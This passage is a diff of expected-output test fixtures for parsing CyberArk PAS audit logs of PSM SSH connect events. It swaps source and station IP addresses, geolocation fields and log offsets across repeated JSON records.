ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 06:49:37", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": 
"US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm connect", @@ -609,7 +574,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 17678, + "log.offset": 17666, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -619,24 +584,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -666,23 +628,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "47747796-03e1-4a11-af39-ab56c00e7732", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:50:43Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 06:50:43", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": 
"US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm connect", @@ -703,7 +660,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 21194, + "log.offset": 21176, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -713,24 +670,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -758,23 +712,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "29f340df-89e9-405a-beae-0216390cda42", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:31:56Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 03:31:56", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - 
"destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm connect", @@ -795,7 +744,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 24710, + "log.offset": 24686, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -805,24 +754,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -850,23 +796,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:33:39Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 03:33:39", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - 
"destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm connect", @@ -887,7 +828,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 27706, + "log.offset": 27676, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -897,24 +838,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -942,23 +880,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:35:00Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 03:35:00", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - 
"destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm connect", @@ -979,7 +912,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 30702, + "log.offset": 30666, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -989,24 +922,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -1030,23 +960,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "692fe25f-f940-4170-8ea4-5241b35173f0", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:18:31Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 06:18:31", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": 
"United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm connect", @@ -1067,7 +992,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 33698, + "log.offset": 33656, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1077,24 +1002,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "adrian" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -1118,23 +1040,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "f5725611-ca57-4a2a-a089-f45b3174a358", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:06Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 07:08:06", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - 
"destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "adrian", "event.action": "psm connect", @@ -1155,7 +1072,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 36226, + "log.offset": 36178, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1165,24 +1082,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "adrian" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -1214,23 +1128,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "7db90436-8a1a-4203-9a96-65137625ab2d", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:28Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 07:08:28", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - 
"destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm connect", @@ -1251,7 +1160,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 38754, + "log.offset": 38700, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1261,24 +1170,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -1310,23 +1216,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:11:09Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 07:11:09", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - 
"destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm connect", @@ -1347,7 +1248,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 42532, + "log.offset": 42472, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1357,24 +1258,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - 